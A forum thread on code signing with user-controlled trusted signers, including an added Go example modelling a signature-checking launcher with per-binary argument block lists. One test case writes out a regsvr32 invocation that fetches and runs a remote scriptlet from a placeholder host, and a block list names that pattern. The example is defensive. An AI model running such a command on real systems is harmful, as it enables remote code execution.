by derekp7 3691 days ago
There is a middle ground. Have the OS enforce only running signed executables, but put the user in control of the certificate authority list. Then if you want Apple's style of security, just put their key in the list. If you want more freedom, add your own key and sign away.
2 comments

Of course, then you'll end up with regsvr32.exe, which is signed by Microsoft and still happily downloads and executes script code from remote servers.

Unfortunately, not even this approach will work. No. To be totally safe, you have to whitelist by digest of the exe and command-line arguments. Which basically means that you have to know how the OS works internally.
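The two policy layers discussed above (a user-controlled list of trusted signing keys, plus a per-digest rule on command-line arguments for signed binaries that will happily fetch and run remote code) can be modelled in a few dozen lines. The following is an added example, not code from any commenter or from any real OS launcher: the executables are constructed byte strings standing in for real images, the keys are deterministic demo keys, and the `Launcher`, `ArgPolicy` and `RunScenarios` names are invented for the illustration. It uses Go's standard-library Ed25519 in place of a real code-signing PKI.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"strings"
)

// Decision is the launcher's verdict for one execution request.
type Decision string

const (
	Allow         Decision = "allow"
	DenyUntrusted Decision = "deny: signer not in user trust list"
	DenyBadSig    Decision = "deny: signature does not verify"
	DenyArgs      Decision = "deny: argument pattern blocked for this digest"
)

// ArgPolicy is a per-executable rule keyed by the SHA-256 of the file image:
// invocations whose arguments contain any listed substring are refused even
// though the binary itself carries a trusted signature.
type ArgPolicy struct {
	BlockedArgs []string
}

// Launcher models the OS-side check: a user-controlled map of signer names to
// public keys, plus optional per-digest argument rules (hypothetical design).
type Launcher struct {
	TrustedKeys map[string]ed25519.PublicKey
	ByDigest    map[string]ArgPolicy
}

// Digest returns the hex SHA-256 of an executable image.
func Digest(exe []byte) string {
	sum := sha256.Sum256(exe)
	return hex.EncodeToString(sum[:])
}

// Sign produces a detached Ed25519 signature over the executable bytes.
func Sign(priv ed25519.PrivateKey, exe []byte) []byte {
	return ed25519.Sign(priv, exe)
}

// Check decides whether exe, claimed to be signed by signer with sig, may run with args.
// Order matters: an untrusted or broken signature is refused before any argument
// policy is consulted, so the digest rules only ever apply to genuinely signed images.
func (l *Launcher) Check(signer string, sig []byte, exe []byte, args []string) Decision {
	pub, ok := l.TrustedKeys[signer]
	if !ok {
		return DenyUntrusted
	}
	if !ed25519.Verify(pub, exe, sig) {
		return DenyBadSig
	}
	if pol, ok := l.ByDigest[Digest(exe)]; ok {
		joined := strings.ToLower(strings.Join(args, " "))
		for _, bad := range pol.BlockedArgs {
			if strings.Contains(joined, strings.ToLower(bad)) {
				return DenyArgs
			}
		}
	}
	return Allow
}

// RunScenarios builds a demo trust list and exercises the cases raised in the thread.
func RunScenarios() map[string]Decision {
	// Deterministic demo keys (constructed; a real deployment would import vendor keys).
	seed := func(b byte) []byte {
		s := make([]byte, ed25519.SeedSize)
		for i := range s {
			s[i] = b
		}
		return s
	}
	vendorPriv := ed25519.NewKeyFromSeed(seed(1))
	userPriv := ed25519.NewKeyFromSeed(seed(2))
	roguePriv := ed25519.NewKeyFromSeed(seed(3))

	// Constructed stand-ins for executable images (not real binaries).
	regsvr := []byte("REGSVR32 IMAGE (constructed stand-in)")
	userTool := []byte("USER TOOL IMAGE (constructed stand-in)")

	l := &Launcher{
		TrustedKeys: map[string]ed25519.PublicKey{
			"vendor": vendorPriv.Public().(ed25519.PublicKey),
			"me":     userPriv.Public().(ed25519.PublicKey),
		},
		// The vendor-signed binary is allowed, but not when told to fetch a remote scriptlet.
		ByDigest: map[string]ArgPolicy{
			Digest(regsvr): {BlockedArgs: []string{"/i:http", "scrobj.dll"}},
		},
	}

	tampered := append([]byte(nil), regsvr...)
	tampered = append(tampered, '!')

	return map[string]Decision{
		"vendor-binary-benign-args":      l.Check("vendor", Sign(vendorPriv, regsvr), regsvr, []string{"/s", `C:\drv\foo.dll`}),
		"vendor-binary-remote-scriptlet": l.Check("vendor", Sign(vendorPriv, regsvr), regsvr, []string{"/s", "/n", "/u", "/i:http://example.invalid/x.sct", "scrobj.dll"}),
		"user-signed-tool":               l.Check("me", Sign(userPriv, userTool), userTool, nil),
		"rogue-signer":                   l.Check("attacker", Sign(roguePriv, userTool), userTool, nil),
		"tampered-image":                 l.Check("vendor", Sign(vendorPriv, regsvr), tampered, nil),
	}
}

func main() {
	for name, d := range RunScenarios() {
		fmt.Printf("%-32s %s\n", name, d)
	}
}
```

The argument check is deliberately a substring match over the whole command line rather than a per-flag parser: the point of the thread is that an allowlist keyed only on "who signed it" is not enough, and that the extra rule has to encode knowledge of what the specific binary does with its arguments, which is exactly the OS-internals burden the comment describes.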

In general, I think that approach would need one other change to either prevent “core” resources (e.g. firmware, kernel, system binaries) from being modified or having a fail-safe way to reset those files back to a trusted base state. Otherwise it'll just hit the same problem where many users will approve any request described as necessary to run the free game/movies/porn/etc. and lose control of their computer.

This is basically what Apple shipped in OS X 10.11 where you can trust third-party developers but System Integrity Protection (https://support.apple.com/en-us/HT204899) tries to limit the damage that even getting root can cause.